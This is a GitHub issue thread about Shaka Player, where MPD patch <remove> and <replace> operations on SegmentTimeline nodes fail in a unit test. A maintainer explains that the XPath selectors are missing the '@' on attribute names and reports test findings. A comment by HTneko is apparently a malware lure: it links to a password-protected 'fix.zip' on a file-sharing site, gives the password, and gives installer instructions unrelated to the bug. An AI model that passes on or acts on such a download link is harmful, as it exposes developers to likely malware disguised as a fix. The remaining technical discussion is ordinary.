### ISSUE TITLE
MPD Patch: <remove> and <replace> not working

### ISSUE THREAD

**Issue by wilsonluniz-harmonicinc** [shaka-project/shaka-player#7225]
**Have you read the [FAQ](https://bit.ly/ShakaFAQ) and checked for duplicate open issues?**
Yes

**If the problem is related to FairPlay, have you read the tutorial?**
No

**What version of Shaka Player are you using?**
Nightly

**Can you reproduce the issue with our latest release version?**
yes

**Can you reproduce the issue with the latest code from `main`?**
yes

**Are you using the demo app or your own custom app?**
demo

**If custom app, can you reproduce the issue using our demo app?**
n/a

**What browser and OS are you using?**
Safari/Chrome@Mac

**For embedded devices (smart TVs, etc.), what model and firmware version are you using?**
No

**What are the manifest and license server URIs?**
N/A

**What configuration are you using?  What is the output of `player.getConfiguration()`?**
everything default

**What did you do?**
Followed by the PR #7218, I found these doesn't work expectedly, at least in unit test:

In practice, MPD:
```
<S d="1" t="0" />
<S d="2" t="1" />
<S d="1" t="3" />
```

Remove patch:
```
<remove sel="/MPD/Period[@id='1']/AdaptationSet[1]/SegmentTemplate/SegmentTimeline/S[t='3']">
</remove>
```

Replace patch:
```
 <replace sel="/MPD/Period[@id='1']/AdaptationSet[1]/SegmentTemplate/SegmentTimeline/S[t='3']/@r">
    3
</replace>
```

Error message:
```
Expected _class2({ startTime: 3, endTime: 4, trueEndTime: 4, ... }) to equal _class2({ startTime: 3, endTime: 6, trueEndTime: 6, ... }).
```

**What did you expect to happen?**

**What actually happened?**
(In some situation?) `<remove>` and `<replace>` not working as intended. This seems not related to shared `<SegmentTemplate>` as PR #7218 is addressing that issue while doesn't help on this issue.

**Are you planning send a PR to fix it?**

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tykus160** [comment]
@wilsonluniz-harmonicinc your examples have a mistake - if you want to modify a node by addressing an attribute, you need to add an `@` to attribute name, i.e. `S[@t='3']`.
I wrote unit tests based on your examples but with a modification I mentioned, here are my findings:
1. `replace` works without problems.
2. `remove` in your example does not work indeed, but it tries to remove last segment, which is rather not a typical scenario in live context.
    - If I try to remove first segment instead, it will be removed (as it's an eviction in fact). 
    - If I add an `add` action to this patch (so first we remove an S node, but then we're adding new one with modified attributes, i.e. `<S d="1" t="3" r="3" />` it will be replaced correctly.
